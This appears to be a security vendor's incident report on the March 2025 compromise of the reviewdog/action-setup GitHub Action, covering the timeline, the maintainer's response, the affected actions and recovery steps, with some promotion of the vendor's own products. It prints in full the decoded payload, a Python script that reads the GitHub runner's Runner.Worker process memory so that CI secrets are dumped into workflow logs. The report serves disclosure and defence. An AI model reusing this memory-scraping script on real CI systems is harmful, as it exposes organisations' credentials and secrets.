.avif)
Introduction
We have concluded our investigation into the supply chain attack affecting several GitHub Actions in the reviewdog organization. Independent researcher Adnan Khan initially disclosed the compromise on March 17, 2025. The affected Action, reviewdog/action-setup@v1, was found to contain malicious code designed to extract CI/CD secrets from GitHub Actions runners. On the same day, Wiz published an in-depth analysis of the attack.
The maintainer has since taken corrective steps to recover from the incident, and details of the recovery timeline, technical findings, and recommended mitigations are outlined below. While the immediate threat has been contained, this event underscores the broader risk of supply chain attacks in CI/CD workflows and the importance of proactive defense.
Timeline of Key Updates
- March 17, 2025 01:00 AM UTC – Researcher Adnan Khan publicly disclosed the compromise.
- March 18, 2025 09:00 PM UTC – The maintainer published a response and confirmed that the compromise occurred between March 11, 2025 18:42 and 20:31 UTC.
Summary of the incident
Independent researcher Adnan Khan disclosed the incident via a tweet on Monday, March 17, at 01:00 AM UTC.
The researcher identified a sample workflow in which the malicious Action version was executed. The screenshot below shows that during this run, the reviewdog/action-setup@v1 tag referenced commit SHA f0d342d24037bb11d26b9bd8496e0808ba32e9ec.
This commit includes the exploit payload encoded in base64 format.
https://github.com/reviewdog/action-setup/commit/f0d342d24037bb11d26b9bd8496e0808ba32e9ec
This commit contains the exploit payload in base64 encoded format. The decoded payload is given below:
#!/usr/bin/env python3
# based on https://davidebove.com/blog/?p=1620
import sys
import os
import re
def get_pid():
# https://stackoverflow.com/questions/2703640/process-list-on-linux-via-python
pids = [pid for pid in os.listdir('/proc') if pid.isdigit()]
for pid in pids:
with open(os.path.join('/proc', pid, 'cmdline'), 'rb') as cmdline_f:
if b'Runner.Worker' in cmdline_f.read():
return pid
raise Exception('Can not get pid of Runner.Worker')
if __name__ == "__main__":
pid = get_pid()
print(pid)
map_path = f"/proc/{pid}/maps"
mem_path = f"/proc/{pid}/mem"
with open(map_path, 'r') as map_f, open(mem_path, 'rb', 0) as mem_f:
for line in map_f.readlines(): # for each mapped region
m = re.match(r'([0-9A-Fa-f]+)-([0-9A-Fa-f]+) ([-r])', line)
if m.group(3) == 'r': # readable region
start = int(m.group(1), 16)
end = int(m.group(2), 16)
# hotfix: OverflowError: Python int too large to convert to C long
# 18446744073699065856
if start > sys.maxsize:
continue
mem_f.seek(start) # seek to region start
try:
chunk = mem_f.read(end - start) # read region contents
sys.stdout.buffer.write(chunk)
except OSError:
continue
This payload, similar to the tj-actions/changed-files incident, accesses the Runner.Worker process memory to steal GitHub Actions secrets. The exfiltrated secrets are subsequently printed in the GitHub Actions workflow logs. The following screenshot from the sample run shows the dumped secrets within the build logs.
This GitHub code search in the reviewdog organization shows that there are a few other composite Actions that depend on the reviewdog/action-setup Action. We have given the list composite reviewdog Actions that use reviewdog/action-setup below.
1. reviewdog/action-shellcheck
2. reviewdog/action-composite-template
3. reviewdog/action-staticcheck
4. reviewdog/action-ast-grep
5. reviewdog/action-typos
As reviewdog/action-setup is compromised, it's safe to assume that atleast the list of Actions given above in the reviewdog organization are also compromised.
Maintainer’s Response
Incident Background
The maintainers of the reviewdog GitHub Actions have acknowledged the security breach and provided additional details about the compromise. According to their investigation, the attack targeted reviewdog/action-setup@v1, potentially leading to the compromise of other widely used GitHub Actions, including tj-actions/changed-files. As a result, repositories using these actions may have inadvertently leaked sensitive information.
The compromise occurred on March 11, 2025, between 18:42 and 20:31 UTC.
How Did the Attack Happen?
The attacker managed to push malicious code to the v1 tag of reviewdog/action-setup. The reviewdog organization’s contributor management process appears to have played a role in this incident. Contributors to reviewdog/action-* repositories were automatically invited to a maintainer team that had write access to these repositories. At the time of the attack, this team had 118 members, increasing the likelihood of an account being compromised.
While the exact method of exploitation is still under investigation, the maintainers suspect the attacker either compromised an existing contributor’s account or gained write access through the automated invitation process. The reviewdog maintainers have clarified that contributors did not have write access to the main reviewdog repository or core projects such as errorformat.
Impacted GitHub Actions
The following reviewdog actions have been identified as affected:
- reviewdog/action-setup@v1 (other tags may also be impacted, though no evidence has been found)
- reviewdog/action-shellcheck@{<v1.29.2}
- reviewdog/action-composite-template@{<v0.20.2}
- reviewdog/action-staticcheck@{<v1.26.2}
- reviewdog/action-ast-grep@{<v1.26.2}
- reviewdog/action-typos@{<v1.17.2}
There is a possibility that other reviewdog actions may also be impacted, though no additional evidence has been found so far.
Actions Taken by the Maintainers
In response to the breach, the maintainers have implemented several security measures:
- Disabled the automated contributor invitation workflow to prevent unauthorized access.
- Revoked write access for most contributors, restricting it to a small group of trusted maintainers.
- Updated all reviewdog repositories to explicitly reference GitHub Actions by commit SHA instead of version tags.
- Pinned reviewdog binary installation scripts using commit SHAs.
- Reviewed security logs and found no suspicious activity related to their maintainer and bot accounts.
- Rotated or revoked Personal Access Tokens (PATs) associated with maintainer and bot accounts.
Recovery steps
🚨 If you are using any of the following Actions from the reviewdog organization, we strongly recommend you stop using it immediately until the incident is resolved.
1. reviewdog/action-setup
2. reviewdog/action-shellcheck
3. reviewdog/action-composite-template
4. reviewdog/action-staticcheck
5. reviewdog/action-ast-grep
6. reviewdog/action-typos
If possible, stop using all reviewdog Actions till the impact of the incident is clear.
Review Actions Inventory
You should perform a code search across your repositories to discover all instances of the reviewdog Actions. For example, the following GitHub search URL shows this information for the Actions GitHub organization:
https://github.com/search?q=org%3Aactions+reviewdog&type=code
Please note that this GitHub search does not always return accurate results. If you have dedicated source code search solutions such as SourceGraph, they could be more effective with finding all instances of this Action in use.
Review GitHub Actions Workflow Run Logs
You should review logs for the recent executions reviewdog Actions and see if it has leaked secrets. Below is an example of how leaked secrets appear in build logs.
This step is especially important for public repositories since their logs are publicly accessible.
Rotate Leaked Secrets
If you discover any secrets in GitHub Actions workflow run logs, rotate them immediately.
Pin GitHub Actions
You should pin your GitHub Actions to full-length commit SHAs to make sure that your workflows always use immutable references. StepSecurity community tier allows maintainers to pin Actions to their full-length commit SHAs for free. You can read about StepSecurity automation to pin Actions here.
For StepSecurity Enterprise Customers
The following steps are applicable only for StepSecurity enterprise customers. If you are not an existing enterprise customer, you can start our 14 day free trial by installing the StepSecurity GitHub App to complete the following recovery step.
Discover Leaked Secrets
We have added a new control specifically to detect leaked secrets in build logs due to this security incident. You can find the new control on the StepSecurity dashboard.
Review Actions Inventory
You can use the Actions inventory feature to discover all GitHub Actions workflows that are using reviewdog Actions.
Use the StepSecurity maintained reviewdog/actions-setup Action
StepSecurity Maintained Actions are usually exclusive to StepSecurity enterprise customers.
To use the StepSecurity maintained Action for reviewdog/actions-setup, simply replace all instances of "reviewdog/actions-setup@vx" with "step-security/reviewdog-action-setup@fab6de28ae8bc2a032c9e655d990afa450edb995 # v1.3.2" or "step-security/reviewdog-action-setup@v1".
For enhanced security, you can pin to the specific commit SHA:
For more details, please refer to README of the project.
Pin GitHub Actions across organization
You can use the StepSecurity pinning dashboard control to discover all Actions that are not pinned in your organization and pin it through automated pull requests.
Next Steps
This incident has now been resolved. The maintainer has published a full response and implemented important long-term security controls.
🚨 More Supply Chain Attacks Could Follow
With credentials leaked in both the tj-actions compromise and this reviewdog incident, there may already be other supply chain attacks that have occurred—or could happen soon. Attackers could reuse leaked credentials to compromise additional GitHub Actions, making it critical to secure your CI/CD pipelines proactively.
👉 Curious how secure your workflows are? Run your repositories through Secure Repo to assess risks, detect misconfigurations, and lock down your CI/CD pipeline.
Let’s stay ahead of supply chain threats—together.
